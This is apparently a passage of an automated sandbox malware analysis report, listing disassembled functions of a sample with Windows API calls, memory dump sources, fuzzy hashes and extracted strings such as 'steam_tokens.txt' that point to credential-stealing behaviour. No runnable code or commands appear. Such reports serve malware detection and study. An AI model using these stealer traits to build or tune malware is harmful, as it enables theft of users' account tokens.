                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: cc8254fbbc9ea717ec0d5366a91dc3fb52bbc855077aba20f8104059adcab76c
                            • Instruction ID: 9ca862e7b97187329637cc7ec77fe4b212c6c4ae8f4b1c478c3cb62f183bf74f
                            • Opcode Fuzzy Hash: cc8254fbbc9ea717ec0d5366a91dc3fb52bbc855077aba20f8104059adcab76c
                            • Instruction Fuzzy Hash: F941847195111DAFCB15EBA4DC42EFD7378FF88300F0444A9BA1A97251DEB09E849BB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7ECDF
                            • lstrlen.KERNEL32(00000000), ref: 00D7ECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7ED1D
                            • lstrlen.KERNEL32(00000000), ref: 00D7ED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00D7ED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: e812d83864d1c95a00304b65550baf7d07eeaaf9716c598b65dcd5dba6249fd7
                            • Instruction ID: a7d0c9a134507bef0f5953c277b93daf3281e23f312fd2a4233812010b60ae7b
                            • Opcode Fuzzy Hash: e812d83864d1c95a00304b65550baf7d07eeaaf9716c598b65dcd5dba6249fd7
                            • Instruction Fuzzy Hash: F7319131A529055BC722FBB8EC5A96E77B8EF44300F085065F80ADB212EBB0DD0687F1
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00D6140E), ref: 00D69A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00D6140E), ref: 00D69AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,00D6140E), ref: 00D69AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,00D6140E,00000000,?,?,?,00D6140E), ref: 00D69AE0
                            • LocalFree.KERNEL32(?,?,?,?,00D6140E), ref: 00D69B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,00D6140E), ref: 00D69B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: f094389c36837af31b1cd1aedf68522105e5a4fff69a9e71d7a3e77b55056404
                            • Instruction ID: a77a75e14c3a35e548b29540cc5f595dc94332cf4440ff356a437e09d10a99ef
                            • Opcode Fuzzy Hash: f094389c36837af31b1cd1aedf68522105e5a4fff69a9e71d7a3e77b55056404
                            • Instruction Fuzzy Hash: 89115B71600209AFEB10DFA9ECD8ABEB3ACEB05344F14025AF91197290EB70DD50CBB0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85B14
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00D85B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 00D85B89
                            • memmove.MSVCRT(00000000,?,?), ref: 00D85B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 51ef135b366379e243cf3042ce56e49b62707266c835ad474cd94c70b017477b
                            • Instruction ID: cdc3a116d5d122395f9010e6a8dd20edda1f7ba74cc2277ef6d8a559ee518a7d
                            • Opcode Fuzzy Hash: 51ef135b366379e243cf3042ce56e49b62707266c835ad474cd94c70b017477b
                            • Instruction Fuzzy Hash: E8417271B006199FCF08DF6CD995AAEBBF5EB98710F148229E909E7344D634ED00CBA0
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77D58
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1D5
                              • Part of subcall function 00D8A1C0: std::exception::exception.LIBCMT ref: 00D8A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 076b92c455c4dc6ea671d8901805583e8f420481e76258b6a97591f218aff751
                            • Instruction ID: a3c466a5f4ab96efb0c38a21046338f6047a2a2313fe302b256beac93557730a
                            • Opcode Fuzzy Hash: 076b92c455c4dc6ea671d8901805583e8f420481e76258b6a97591f218aff751
                            • Instruction Fuzzy Hash: B32191323043009FD7309E6CD891A3AB7E5EFA1754F248E6EE49A8B241E761D84587B5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D833EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D833F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00D83411
                            • wsprintfA.USER32 ref: 00D83437
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: 7833371afd6c140abba13dd8e07d642c46a1eb3132b10047a20487b86bbc43f6
                            • Instruction ID: 82020f59344fc6159a2e0071469fe37aa810ad7da202beb8bd92d919fabde869
                            • Opcode Fuzzy Hash: 7833371afd6c140abba13dd8e07d642c46a1eb3132b10047a20487b86bbc43f6
                            • Instruction Fuzzy Hash: 9901B571A04218AFDB14EFACDC46B6EB7BCFB45B10F00012AF916E7380D7B4590087A1
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00BFDC80,00000000,00020119,?), ref: 00D7D7F5
                            • RegQueryValueExA.ADVAPI32(?,00BFE1F8,00000000,00000000,00000000,000000FF), ref: 00D7D819
                            • RegCloseKey.ADVAPI32(?), ref: 00D7D823
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7D848
                            • lstrcat.KERNEL32(?,00BFE228), ref: 00D7D85C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: d2d00ee7de9cbb207349f4e3ec3680e4b4c9cc06d056e8ad8751bc31be1c7e4d
                            • Instruction ID: ff4737654c5c2bbc4d5519fe150ae1c0358e2bed81f583f104370f27f08702cd
                            • Opcode Fuzzy Hash: d2d00ee7de9cbb207349f4e3ec3680e4b4c9cc06d056e8ad8751bc31be1c7e4d
                            • Instruction Fuzzy Hash: 4E416075A1010C9BCB54EF64EC82BDE7779EF44344F048465B90AD7251EE70AA89CFB1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D77F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D77F60
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D77FA5
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D77FD3
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D78007
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 5d865519f3f8ee005dfd5f9396970e3c5c4a8097e62fa89c950ebdbb52aeb981
                            • Instruction ID: 2f2d316697bff59493acf2f7d2e6d73ea07ab3de26a485e3b12655c5b16b5ee6
                            • Opcode Fuzzy Hash: 5d865519f3f8ee005dfd5f9396970e3c5c4a8097e62fa89c950ebdbb52aeb981
                            • Instruction Fuzzy Hash: A441C43060811ADFCB20DF68D584EAEB7B4FF54300F118499E809D7351EB71EA55CBA1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D780BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D780EA
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D78102
                            • lstrlen.KERNEL32(00000000), ref: 00D78140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7816F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 3c626e1a6a1d5f40e1c6389d8b88b333c07117fa6edb4bed2f8bfbcb57d4b367
                            • Instruction ID: 322b28414a0830ae4a70b0e06d6ad6a9b244f5b80ddeb50f52faa8a6d453bd35
                            • Opcode Fuzzy Hash: 3c626e1a6a1d5f40e1c6389d8b88b333c07117fa6edb4bed2f8bfbcb57d4b367
                            • Instruction Fuzzy Hash: F0419E71A40206ABCB21DF78D958BAABBF4EF44300F19841DAC49D7204FF74D946DBA0
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00D81B72
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8184F
                              • Part of subcall function 00D81820: lstrlen.KERNEL32(00BE7660), ref: 00D81860
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D81887
                              • Part of subcall function 00D81820: lstrcat.KERNEL32(00000000,00000000), ref: 00D81892
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D818C1
                              • Part of subcall function 00D81820: lstrlen.KERNEL32(00D94FA0), ref: 00D818D3
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D818F4
                              • Part of subcall function 00D81820: lstrcat.KERNEL32(00000000,00D94FA0), ref: 00D81900
                              • Part of subcall function 00D81820: lstrcpy.KERNEL32(00000000,00000000), ref: 00D8192F
                            • sscanf.NTDLL ref: 00D81B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D81BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D81BC6
                            • ExitProcess.KERNEL32 ref: 00D81BE3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: 3f200260234e263eb260b04c64b11f74cf2fee5ae3e478200184bcf8945a4f5d
                            • Instruction ID: a287d35f5cbee990adce68431ffabac03dfa14e4711fc41f7e48af215903176d
                            • Opcode Fuzzy Hash: 3f200260234e263eb260b04c64b11f74cf2fee5ae3e478200184bcf8945a4f5d
                            • Instruction Fuzzy Hash: EE21E6B5518305AF8350EF69D88585BBBF8FEC8214F405A1EF5A9C3220E770E5098BA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D83166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D8316D
                            • RegOpenKeyExA.ADVAPI32(80000002,00BEB5E8,00000000,00020119,?), ref: 00D8318C
                            • RegQueryValueExA.ADVAPI32(?,00BFDA60,00000000,00000000,00000000,000000FF), ref: 00D831A7
                            • RegCloseKey.ADVAPI32(?), ref: 00D831B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
